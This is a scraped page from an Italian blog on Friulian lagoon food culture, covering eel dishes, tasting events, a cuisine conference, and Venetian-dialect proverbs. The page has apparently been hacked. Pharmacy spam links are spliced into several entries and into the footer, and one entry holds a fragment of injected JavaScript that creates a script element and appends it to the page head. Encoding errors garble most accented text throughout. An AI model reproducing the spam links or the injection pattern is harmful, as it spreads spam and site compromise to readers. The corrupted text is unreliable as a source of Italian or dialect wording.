La cultura ai??i??si mangia!

Buy http://www.mediarelease.nl/overig/purchase-hytrin-generic/ Nellai??i??ambito del convegno La cultura ai??i??si mangia! Il cibo come patrimonio culturale. In pescaria vecia si A? tenuto il convegno: Oggi parliamo di pesce. Le novitAi?? legate al Bisato in Entra »

Valerio Ghin

Purchase d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s); http://rarespanta.ro/how-much-does-endep-cost/ buy differin gel cost of pilex tablets purchase micronase medication Purchase intlo illalu vantintlo priyuralu telugu movie online veoh cymbalta 60 mg street price cephalexin acne Entra »

Rivvinitalybisato2014rid

ai???PRIMAai??i?? PER IL ai???BISATO IN SPEOai??i?? Lai??i??ANGUILLA ALLO SPIEDO DELLA TRADIZIONE LAGUNARE NEL GRANDE SALONE INTERNAZIONALE

PRESENTATO ASSIEME AI VINI DELLE TRE DOC RIVIERASCHE NELLO STAND DEL FVG Ha conquistato anche al ai???Vinitalyai??i?? il palato di gourmet, degustatori, enologi, buyer, appassionati dei sapori del territorio il ai???Bisato in Entra »

Serata con le Piume di Laguna e i Cru di Ronchi di Cialla

Venerdi 19 o 26 Aprile Degustazione con Le Piume di Laguna !!! Millefoglie con PatA? di Alzavola Anguilla affumicata e Mela verde Caramellata , Petto di Germano Reale con Lardo di Colonnata Entra »

SIndacocepilemorandin

TURISMO/ENOGASTRONOMIA: I FONDAMENTI DELLA CUCINA TIPICA DEL TERRITORIO DELLA RIVIERA FRIULANA

order suprax antibiotic used to treat buy tadalista 20 LE BASI GETTATE NEL CONVEGNO ‘LEGATO AL 5.PREMIO GIORNALISTICO ‘VALERIO GHIN’ A MARANO LAGUNARE (UD) TRE LE AREE DEI SAPORI INDIVIDUATE: DEL GRADESE, Entra »

Category Archives: rubriche

LA CALABRIA UNA VOCAZIONE VINICOLA CHE SI PERDE NELLai??i??ANTICHITAai??i??

20160917_103216Una terra baciata dal sole, unai??i??area con terreni argillosi e ghiaiosi, a volte

FilastroccaFilastrocche

Filastrocche

Pills Cheap http://kunar.com.tr/terramycin-spray-without-prescription/ Cheap buy nolvadex mexico Purchase

Son marinaio, marinaio de la marina,
porto le chiavi de lai??i??oro e de lai??i??arzento
son marinaio de questo bastimento
finchAi?? lai??i??Italia piA? libera sarAi??. Filastrocca:
San Martin ze ai???ndA? a palazzo con el libro soto el brasso
E par dAi?? la so rason, San Martin el ze ai???ndA? in preson = riferito a chi va per strada con grosso libro, dandosi importanza da letterato.
A lai??i??amigo peleghe el figo, al nemigo el persego.
Acqua, dieta e servissial, guarissi lai??i??omo de ogni mal.
Ama chi tai??i??ama, e rispundi c chi te ciama.
Amigo de ventura, dAi?? tanto da fa e poco dura.
Amigo vecio e casa niova.
Amissi veri, i ze ciari come le mosche bianche.
Amor e signorAi??a nol pol sta in compagnia.
Amor no fa boge la pignata.
Amor no ze brodo de fasiA?i.
Amor sensa barufa, presto o tardi vien la mufa.
Barca neta, no vadagna.
Bela vigna, poca ua.
Can che baia ciama desgrassie.
Can vecio nol baio de bando.
Chi bela vol aparAi??, la pele dela testa no ga de diolAi??.
Chi ga dei morosi, ga dei regai.
Chi ga santoli, ga bussolai.
Chi ghe ga amaro in boca, nol pol spuAi?? dolse.
Chi maltrata le bestie, maltrata anca i cristiani.
Chi no ga gato, mantien i surzi.
Chi no ga tempo no speti tempo.
Chi rumpi paga.
Chi rumpi vecio paga niovo.
Chi trova un amigo, trova un tesoro.
Chi vol andAi?? massa in suzo, casca par tera e se rumpi el muso.
Coai??i?? lai??i??amalAi?? el vol andAi?? via, segno chai??i??el lassa la pele.
Dei amissi, veghene anca a casa de diavolo.
Do amanti no sta ben sui, in tun giogo, ze come vai??i?? la pagia rente el fogo.
Dona smemorada, dona inamorada.
Duti volarissi vA? la mescola in man = cioA? il comando o il potere sia della cosa pubblica che privata.
El primo amor nol se scorda mai.
Esse tra lai??i??incusene e el martel.
I pensieri i fa deventAi?? veci prima del tempo.
Inte le ocasion se cugnussi lai??i??amigo.
Lai??i??amor che nassi in Carneval, muri in Quaresema.
Lai??i??amor no ciapa ruzene.
Lai??i??oro no ciapa macia.
La dona picinina par sempre zovenina.
La me vidi come el fumo inti oci.
Luntan dai oci untan dal cuor.
Marinaio, morosa in ogni porto.
Na roba fata par forsa, no val una scorsa.
Pati ciari e amicissia longa.
Se i basi fussi busi, duti i musi i sarissi sbusi.Se te vol chai??i??el te ama, fa chai??i??el te brama.
Se ve piaze la fAi??a, coltivA? la mare.
Val piA? unai??i??ora de ben che sento de mal.

MODI DI DIRE N.13

A pansa in su = supino.
A pansa in zo = bocconi.
Fa pecA? = dispiace.
Gelosia dela scala = ringhiera.
LicA? dele maghe = impomatato.
Maregna = matrigna.
No se pol fassela passAi?? = non si puA? credere.
Otava de Pasqua = la domenica dopo la Pasqua.
Pan de Spagna, pan de sofrito, pan de zupa, pan duro, pan dolse, pan coai??i?? la mufa, pan coai??i?? lai??i??ua, pan coai??i?? le olive, pan biscotA?, pan duro, pan molo, pan de sete croste, crosta de pan, molena de pan, pan e butiro, pan e sucaro, pan vecio, pan fresco, pan fato in casa, pan bugAi??o, pan onto, pan suto.
Panada = minestra fatta di pane.
Panariss = malattiaAi?? che si presenta alla base delle unghie.
Panatica al piovan = assegno per gli alimenti.
Pandol = riferito a bambino impacciato.
Panizel = panno lino per fasciare i neonati.

Modi di dire n.10

I nuni,Ai?? gnanca i gransi li magna = pesceAi?? (pesceai???nono,Ai?? Aphanius) non buono da mangiare.
VA? el naso come ai???na napa = avere il naso grande come la cappa di un camino.
Fa la napoletana = nel gioco a carte tresette, si chiamano cosAi?? le prime tre carte riunite di maggior valore, cioA? lai??i??asso, il due e il tre di alcuni semi.
El veva dute leranse garbe = aveva tutte le arance poco mature.
CiapAi?? na nasada = essere sottoposti a critiche, farsi sorprendere.
Veai??i?? el naso stropA? = avere il naso intasato.
Questa ghe dAi?? in tel naso =Ai??Ai?? questaAi?? gli dispiace.

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo